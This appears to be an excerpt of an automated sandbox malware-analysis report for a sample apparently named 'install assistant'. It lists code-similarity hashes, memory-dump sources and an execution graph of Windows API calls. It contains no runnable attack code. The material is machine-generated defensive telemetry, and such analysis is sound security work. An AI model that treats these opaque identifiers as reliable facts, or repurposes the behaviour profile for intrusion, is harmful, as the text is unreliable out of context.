                                          • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                          • Instruction Fuzzy Hash: 0551817190424AEFCF20DF98CD848EDB7B1BF49318F10892EE525ABB50D7359A95CB10
                                           Memory Dump Source
                                           • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: $D^J
                                          • API String ID: 3519838083-3977321784
                                          • Opcode ID: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                          • Instruction ID: f5e28a858c579bbe6972a1d885155b539d2d50faaf244a1a5780a4fa7b782f82
                                          • Opcode Fuzzy Hash: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                          • Instruction Fuzzy Hash: C9416821B065917FD7328B6DCEA5BF8BBA19F16308F148D78C4D247E85DB64588AC390
                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6C7D46D6), ref: 6C7CD01B
                                          • __dosmaperr.LIBCMT ref: 6C7CD022
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                           • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr
                                          • String ID: 8Q
                                          • API String ID: 1659562826-4022487301
                                          • Opcode ID: 425720986d8c72e8a43241ff210f3097090c8d814fead69205c8ebcf105d5503
                                          • Instruction ID: 1942c0e20635ed416fba03bfb80d80635c2a2fae7f868e1f371b82a3eb492cf3
                                          • Opcode Fuzzy Hash: 425720986d8c72e8a43241ff210f3097090c8d814fead69205c8ebcf105d5503
                                          • Instruction Fuzzy Hash: EA41ED32704196AFD721DF6CCA80BA97FE4EF47309F284269E8808B702D3719C02C796
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                           • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID: U#hl$q!hl
                                          • API String ID: 4218353326-1496782519
                                          • Opcode ID: 423e2b0066346b8af9a477a992f3a2c594eb99b0d1eb4fc3422dc72b24055755
                                          • Instruction ID: 01c010e650a5bae16a1a1f516ee23110174cf6497261908212bf150952b6922f
                                          • Opcode Fuzzy Hash: 423e2b0066346b8af9a477a992f3a2c594eb99b0d1eb4fc3422dc72b24055755
                                          • Instruction Fuzzy Hash: BB4191B2D012189BDB00DFA4DD88ADEBBB9EF48354F150125E804A7740E7359A58CBA5
                                           Memory Dump Source
                                           • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: X&L$p|J
                                          • API String ID: 3519838083-2944591232
                                          • Opcode ID: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                                          • Instruction ID: 168fd1e2c666f8f19537f7bb45074787ed93c0d02afee5fa34b04ce2e2874906
                                          • Opcode Fuzzy Hash: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                                          • Instruction Fuzzy Hash: 313128326D6309C7D7209B58DB0DBEA7765EB25328F10452ED510A6EEACB7889C5CAC0
                                           Memory Dump Source
                                           • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: 0|J$`)L
                                          • API String ID: 3519838083-117937767
                                          • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                          • Instruction ID: 2518cd447e1b12463090c71ff35d6dec98c73067f676a3de5277f311ff4595f8
                                          • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                          • Instruction Fuzzy Hash: 9041B532601745EFCB219F64C6987EEBBE2FF89309F00482EE45697B50CB756944CBA1
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: __aulldiv
                                          • String ID: 3333
                                          • API String ID: 3732870572-2924271548
                                          • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                          • Instruction ID: f09c4ed9ac0892f7a6d2c403fda9f9bbf2b09ff8a25a103b5f643efadc4b8a46
                                          • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                          • Instruction Fuzzy Hash: F421A6B1A017046FD7308FAAC984B6BBAFDFB44715F108D2EB146D7B40D770A9448BA5
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: @$LuJ
                                          • API String ID: 3519838083-205571748
                                          • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                          • Instruction ID: 45162eb65b66b4f461abc8a428bb6fdf70d346e658a0a09379c6daf2ed9ebafa
                                          • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                          • Instruction Fuzzy Hash: 0801C4B1E01349DADB20DF9985945AEF7B4FF55304F40882EE02AE3B40C3386944CB95
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: @$xMJ
                                          • API String ID: 3519838083-951924499
                                          • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                          • Instruction ID: cc6fd4d93c3cda494d1e54b81630a6373d6c969c46ae36c511291e499ab47e4e
                                          • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                          • Instruction Fuzzy Hash: 6A117CB1A01209DBCB10DF99C5D45AEB7B4FF58348B50C82ED479E7B00D3389A16CB55
                                          APIs
                                          • _free.LIBCMT ref: 6C7CDD49
                                          • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6C7CA63A,?,00000004,?,4B42FCB6,?,?,6C7BF78C,4B42FCB6,?), ref: 6C7CDD85
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: AllocHeap_free
                                          • String ID: 8Q
                                          • API String ID: 1080816511-4022487301
                                          • Opcode ID: fa47c58c95e95cae6881c793cbef599b47207caecfee1faea8afcad01283ead0
                                          • Instruction ID: de5e050cba9566cd0d62042c03baf7fef2b892ff38602f1cbe1f519a757d07c7
                                          • Opcode Fuzzy Hash: fa47c58c95e95cae6881c793cbef599b47207caecfee1faea8afcad01283ead0
                                          • Instruction Fuzzy Hash: C5F0C832B81A076EDB211E669E4DB9A37688F93B78B150537E81497E90EB30C401D5EB
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prologctype
                                          • String ID: |zJ
                                          • API String ID: 3037903784-3782439380
                                          • Opcode ID: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                          • Instruction ID: 0c46ae7101cf0262a46fb2e8fff1bd87d912b6e787b19b8443359270f4488822
                                          • Opcode Fuzzy Hash: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                          • Instruction Fuzzy Hash: 42E06572A155109BEB258F48DA147DEF3ACFF64B14F10446F9016A7A41CBB5AD4486C1
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prologctype
                                          • String ID: <oJ
                                          • API String ID: 3037903784-2791053824
                                          • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                          • Instruction ID: 684dd552967136d75c06ba0c969672ec78f5cfc5958097dc26d6ad4b69f7fe1f
                                          • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                          • Instruction Fuzzy Hash: 53E06D32A1A5159BDB249F48DA20BEEF7A8EF55724F11452EE012A7F51CBB2A8048684
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @ K$DJ$T)K$X/K
                                          • API String ID: 0-3815299647
                                          • Opcode ID: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                                          • Instruction ID: 74738cda08e431f8e49f015cc54b7062796955a4df79e225a1c83ff769e39505
                                          • Opcode Fuzzy Hash: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                                          • Instruction Fuzzy Hash: 6791033160438D9BCF20DEA4C6547EE73A2AF6630CF10CC1EC8621BB85DB79A949CB51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: D)K$H)K$P)K$T)K
                                          • API String ID: 0-2262112463
                                          • Opcode ID: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                                          • Instruction ID: ae6ec206d89c3b9631ba36d15d2ea3ed56214c7ebac5b9c14213653f20eabcea
                                          • Opcode Fuzzy Hash: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                                          • Instruction Fuzzy Hash: 5651C37290420D9BCF11CF94DA48ADEB7B5EFA931CF10C81AE81167A90DB76994CC750

                                          Execution Graph

                                          Execution Coverage:4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0.4%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:31
                                          execution_graph (serialized interactive graph; the node numbers and edge arrows of the dump are omitted here, and only the node labels it carried are kept, grouped by the API or runtime function each node resolves to)

                                          Windows API nodes
                                          • c79252: GetModuleHandleW, GetProcAddress, GetDiskFreeSpaceW
                                          • c7689b, c768d4 (inside c76868, 12 API calls): FindFirstFileW
                                          • c76848 / c76852: FindClose
                                          • c77c79 (inside c77c68): WriteFile
                                          • c77656 (inside c7764c): CloseHandle
                                          • c7757d, c7b8ec: GetLastError
                                          • c76ec7: SetLastError
                                          • c722bf, c742e3: CharUpperW
                                          • c77099, c74adf: wcscmp
                                          • c7965d / c7967e, c98b05, c98b64, c98b80: VariantClear
                                          • c84cac: VariantClear, __EH_prolog
                                          • c84115: VariantClear, _CxxThrowException, __EH_prolog
                                          • c73097: malloc, _CxxThrowException, free, SysStringLen (ctype)

                                          CRT / C++ runtime nodes
                                          • c71e40: free
                                          • c71e0c / c71e1c: malloc; c71e2a: _CxxThrowException (ctype, 2 API calls)
                                          • c71089, c731e5, c73221, c73199, c7859e: malloc, _CxxThrowException, free, _CxxThrowException
                                          • c76919, c93333: malloc, _CxxThrowException, free
                                          • c71524, c85459: malloc, _CxxThrowException, __EH_prolog
                                          • cb0551: malloc, _CxxThrowException, free, memcpy (ctype)
                                          • c78f57, c735e7: memmove
                                          • c8789c: free, memmove (ctype)
                                          • c88804, c97ebb, c854a0, ca2db9, c750ff: free (ctype)
                                          • __EH_prolog entry points at c9dad1, c790e4, c87e64, c76c7c, c76872, c78b8a, cbad44, c8630f, c98fae, c85130, c936f4, c9926c, c85bf4, c854ca, c8563a, c858c8, c8719a

                                          Aggregated call nodes (label gives only a call count)
                                          • 2 API calls: c72e04, c72e47, c72ba6, c72f1c
                                          • 3 API calls: c72f88, c72fec
                                          • 4 API calls (2 library calls): c86217
                                          • 5 API calls: c936ea; c78011 (ctype); c743b7, c87853 (2 library calls)
                                          • 6 API calls (2 library calls): c76332
                                          • 7 API calls: c87140
                                          • 9 API calls: c85110, c98f2e
                                          • 10 API calls (2 library calls): c7823d, c93558, c98b9c
                                          • 11 API calls (2 library calls): c76bf5, c75b2d
                                          • 13 API calls: c7717b
                                          • 17 API calls: c76bb5
                                          • 28 API calls: c77b41
                                          • 42 / 44 API calls: c76c72
                                          • 53 API calls (2 library calls): c857c1
                                          • 69 API calls (2 library calls): c86b5e
                                          • 107 API calls: cbaeeb, cbaebf
74254 c871dd 74249->74254 74251 c84d78 VariantClear 74250->74251 74253 c871b7 74251->74253 74253->73703 74261 c86fc5 74254->74261 74255 c872b4 74256 c84d78 VariantClear 74255->74256 74257 c872c0 74255->74257 74256->74257 74257->74253 74258 c87140 7 API calls 74257->74258 74258->74253 74259 c87236 74259->74253 74259->74255 74260 c872a3 SetFileSecurityW 74259->74260 74260->74255 74262 c86fcf __EH_prolog 74261->74262 74287 c844a6 74262->74287 74267 c8709e 74314 c71e40 free 74267->74314 74269 c87029 74271 c8706a 74269->74271 74309 c84dff 7 API calls 2 library calls 74269->74309 74270 c87051 74270->74271 74275 c811b4 107 API calls 74270->74275 74290 c868ac 74271->74290 74274 c870c0 74310 c76096 15 API calls 2 library calls 74274->74310 74275->74271 74276 c8712e 74276->74259 74278 c870d1 74279 c870e2 74278->74279 74311 c84dff 7 API calls 2 library calls 74278->74311 74283 c870e6 74279->74283 74312 c86b5e 69 API calls 2 library calls 74279->74312 74282 c870fd 74282->74283 74284 c87103 74282->74284 74283->74267 74313 c71e40 free 74284->74313 74286 c8710b 74286->74276 74288 c72e04 2 API calls 74287->74288 74289 c844be 74288->74289 74289->74269 74289->74271 74308 c86e71 12 API calls 2 library calls 74289->74308 74291 c868b6 __EH_prolog 74290->74291 74292 c77d4b 6 API calls 74291->74292 74293 c86921 74291->74293 74305 c868c5 74291->74305 74296 c86906 74292->74296 74294 c86962 74293->74294 74298 c86998 74293->74298 74317 c86a17 6 API calls 2 library calls 74293->74317 74294->74298 74318 c72dcd malloc _CxxThrowException 74294->74318 74296->74293 74316 c84dff 7 API calls 2 library calls 74296->74316 74297 c869e1 74321 c7bcf8 CloseHandle 74297->74321 74298->74297 74315 c77c3b SetFileTime 74298->74315 74300 c8697a 74319 c86b09 13 API calls __EH_prolog 74300->74319 74305->74267 74305->74274 74306 c8698c 74320 c71e40 free 74306->74320 74308->74269 74309->74270 74310->74278 74311->74279 74312->74282 74313->74286 74314->74276 74315->74297 74316->74293 74317->74294 74318->74300 
74319->74306 74320->74298 74321->74305 74322 cb0343 74327 cb035f 74322->74327 74325 cb0358 74328 cb0369 __EH_prolog 74327->74328 74344 c8139e 74328->74344 74336 cb03a2 74361 c71e40 free 74336->74361 74338 cb03aa 74362 cb03d8 74338->74362 74343 c71e40 free 74343->74325 74345 c813ae 74344->74345 74346 c813b3 74344->74346 74378 d07ea0 SetEvent GetLastError 74345->74378 74348 cb01c4 74346->74348 74351 cb01ce __EH_prolog 74348->74351 74349 cb0203 74379 c71e40 free 74349->74379 74351->74349 74380 c71e40 free 74351->74380 74352 cb020b 74354 cb0143 74352->74354 74355 cb014d __EH_prolog 74354->74355 74358 cb0182 74355->74358 74382 c71e40 free 74355->74382 74357 cb018a 74360 c71e40 free 74357->74360 74381 c71e40 free 74358->74381 74360->74336 74361->74338 74363 cb03e2 __EH_prolog 74362->74363 74364 c8139e ctype 2 API calls 74363->74364 74365 cb03fb 74364->74365 74383 d07d50 74365->74383 74367 cb0403 74368 d07d50 ctype 2 API calls 74367->74368 74369 cb040b 74368->74369 74370 d07d50 ctype 2 API calls 74369->74370 74371 cb03b7 74370->74371 74372 cb004a 74371->74372 74373 cb0054 __EH_prolog 74372->74373 74389 c71e40 free 74373->74389 74375 cb0067 74390 c71e40 free 74375->74390 74377 cb006f 74377->74325 74377->74343 74378->74346 74379->74352 74380->74351 74381->74357 74382->74355 74384 d07d59 CloseHandle 74383->74384 74385 d07d7b 74383->74385 74386 d07d64 GetLastError 74384->74386 74387 d07d75 74384->74387 74385->74367 74386->74385 74388 d07d6e 74386->74388 74387->74385 74388->74367 74389->74375 74390->74377 74391 cf6bc6 74392 cf6bcd 74391->74392 74394 cf6bca 74391->74394 74393 cf6bd1 malloc 74392->74393 74392->74394 74393->74394 74395 c9d3c2 74396 c9d3e9 74395->74396 74397 c7965d VariantClear 74396->74397 74398 c9d42a 74397->74398 74399 c9d883 2 API calls 74398->74399 74400 c9d4b1 74399->74400 74486 c98d4a 74400->74486 74403 c98b05 VariantClear 74406 c9d4e3 74403->74406 74503 c92a72 74406->74503 74407 c72fec 3 API calls 74408 c9d594 74407->74408 74409 c9d5cd 74408->74409 74410 
c9d742 74408->74410 74412 c9d7d9 74409->74412 74507 c99317 74409->74507 74534 c9cd49 malloc _CxxThrowException free 74410->74534 74537 c71e40 free 74412->74537 74413 c9d754 74417 c72fec 3 API calls 74413->74417 74420 c9d763 74417->74420 74418 c9d7e1 74538 c71e40 free 74418->74538 74419 c9d5f1 74422 cb04d2 5 API calls 74419->74422 74535 c71e40 free 74420->74535 74425 c9d5f9 74422->74425 74424 c9d7e9 74427 c9326b free 74424->74427 74513 c9e332 74425->74513 74426 c9d76b 74536 c71e40 free 74426->74536 74435 c9d69a 74427->74435 74431 c9d773 74433 c9326b free 74431->74433 74433->74435 74434 c9d610 74520 c71e40 free 74434->74520 74437 c9d618 74521 c9326b 74437->74521 74439 c9d2a8 74439->74435 74461 c9d883 74439->74461 74442 c72fec 3 API calls 74462 c9d88d __EH_prolog 74461->74462 74463 c72e04 2 API calls 74462->74463 74464 c9d8c6 74463->74464 74465 c72e04 2 API calls 74464->74465 74466 c9d8d2 74465->74466 74467 c72e04 2 API calls 74466->74467 74468 c9d8de 74467->74468 74539 c92b63 74468->74539 74471 c92b63 2 API calls 74472 c9d34f 74471->74472 74472->74442 74487 c98d54 __EH_prolog 74486->74487 74501 c98da4 74487->74501 74547 c72b55 malloc _CxxThrowException free _CxxThrowException ctype 74487->74547 74488 c98e09 74490 c7965d VariantClear 74488->74490 74489 c98e15 74491 c98e2d 74489->74491 74492 c98e5e 74489->74492 74495 c98e21 74489->74495 74494 c98e11 74490->74494 74491->74492 74493 c98e2b 74491->74493 74496 c7965d VariantClear 74492->74496 74498 c7965d VariantClear 74493->74498 74494->74403 74548 c73097 malloc _CxxThrowException free SysStringLen ctype 74495->74548 74496->74494 74500 c98e47 74498->74500 74500->74494 74549 c98e7c 6 API calls __EH_prolog 74500->74549 74501->74488 74501->74489 74501->74494 74504 c92a82 74503->74504 74505 c72e04 2 API calls 74504->74505 74506 c92a9f 74505->74506 74506->74407 74511 c99321 __EH_prolog 74507->74511 74508 c99360 74509 c7965d VariantClear 74508->74509 74510 c993d0 74509->74510 74510->74412 74510->74419 74511->74508 74550 c79686 
VariantClear 74511->74550 74514 c9e33c __EH_prolog 74513->74514 74515 c71e0c ctype 2 API calls 74514->74515 74516 c9e34a 74515->74516 74517 c9d608 74516->74517 74551 c9e3d1 malloc _CxxThrowException __EH_prolog 74516->74551 74519 c71e40 free 74517->74519 74519->74434 74520->74437 74522 c93275 __EH_prolog 74521->74522 74552 c92c0b 74522->74552 74525 c92c0b ctype free 74526 c93296 74525->74526 74557 c71e40 free 74526->74557 74528 c9329e 74558 c71e40 free 74528->74558 74530 c932a6 74559 c71e40 free 74530->74559 74532 c932ae 74532->74439 74534->74413 74535->74426 74536->74431 74537->74418 74538->74424 74540 c92b6d __EH_prolog 74539->74540 74541 c72e04 2 API calls 74540->74541 74542 c92b9a 74541->74542 74543 c72e04 2 API calls 74542->74543 74544 c92ba5 74543->74544 74544->74471 74547->74501 74548->74493 74549->74494 74550->74508 74551->74517 74560 c71e40 free 74552->74560 74554 c92c16 74561 c71e40 free 74554->74561 74556 c92c1e 74556->74525 74557->74528 74558->74530 74559->74532 74560->74554 74561->74556 74562 c9a7c5 74570 c9a96b 74562->74570 74580 c9a7e9 74562->74580 74563 c9ade3 74667 c71e40 free 74563->74667 74564 c9a952 74564->74570 74648 c9e0b0 6 API calls 74564->74648 74566 c9adeb 74668 c71e40 free 74566->74668 74570->74563 74572 c9ac1e 74570->74572 74596 c9ac6c 74570->74596 74609 c9ad88 74570->74609 74613 c9ad17 74570->74613 74615 c9acbc 74570->74615 74629 c8101c 74570->74629 74632 c998f2 74570->74632 74638 c9cc6f 74570->74638 74649 c99531 5 API calls __EH_prolog 74570->74649 74650 c980c1 malloc _CxxThrowException __EH_prolog 74570->74650 74651 c9c820 5 API calls 2 library calls 74570->74651 74652 c9814d 6 API calls 74570->74652 74653 c98125 free ctype 74570->74653 74571 c9ae99 74574 c71e0c ctype 2 API calls 74571->74574 74654 c71e40 free 74572->74654 74573 cb04d2 malloc _CxxThrowException free _CxxThrowException memcpy 74577 c9adf3 74573->74577 74578 c9aea9 memset memset 74574->74578 74577->74571 74577->74573 74581 c9aedd 74578->74581 74579 c9ac26 74655 c71e40 
free 74579->74655 74580->74564 74589 cb04d2 5 API calls 74580->74589 74647 c9e0b0 6 API calls 74580->74647 74669 c71e40 free 74581->74669 74586 c9aee5 74670 c71e40 free 74586->74670 74588 c9aef0 74671 c71e40 free 74588->74671 74589->74580 74592 c9ac2e 74672 c71e40 free 74592->74672 74594 c9c430 74673 c71e40 free 74594->74673 74656 c71e40 free 74596->74656 74597 c9c438 74674 c71e40 free 74597->74674 74599 c9c443 74675 c71e40 free 74599->74675 74602 c9ac85 74657 c71e40 free 74602->74657 74605 c9c44e 74676 c71e40 free 74605->74676 74607 c9c459 74664 c98125 free ctype 74609->74664 74661 c98125 free ctype 74613->74661 74614 c9ad93 74665 c71e40 free 74614->74665 74658 c98125 free ctype 74615->74658 74619 c9adac 74666 c71e40 free 74619->74666 74620 c9acc7 74659 c71e40 free 74620->74659 74621 c9ad3c 74662 c71e40 free 74621->74662 74625 c9ace0 74660 c71e40 free 74625->74660 74626 c9ad55 74663 c71e40 free 74626->74663 74677 c7b95a 74629->74677 74633 c998fc __EH_prolog 74632->74633 74684 c99987 74633->74684 74635 c99970 74635->74570 74636 c99911 74636->74635 74688 c9ef8d 12 API calls 2 library calls 74636->74688 74728 cb5505 74638->74728 74732 cbf445 74638->74732 74738 cbcf91 74638->74738 74639 c9cc8b 74643 c9cccb 74639->74643 74746 c9979e VariantClear __EH_prolog 74639->74746 74641 c9ccb1 74641->74643 74747 c9cae9 VariantClear 74641->74747 74643->74570 74647->74580 74648->74570 74649->74570 74650->74570 74651->74570 74652->74570 74653->74570 74654->74579 74655->74592 74656->74602 74657->74592 74658->74620 74659->74625 74660->74592 74661->74621 74662->74626 74663->74592 74664->74614 74665->74619 74666->74592 74667->74566 74668->74577 74669->74586 74670->74588 74671->74592 74672->74594 74673->74597 74674->74599 74675->74605 74676->74607 74678 c7b969 74677->74678 74679 c7b97d 74677->74679 74678->74679 74680 c77731 5 API calls 74678->74680 74679->74570 74681 c7b9ee 74680->74681 74681->74679 74683 c7b8ec GetLastError 74681->74683 74683->74679 74685 c99991 __EH_prolog 74684->74685 
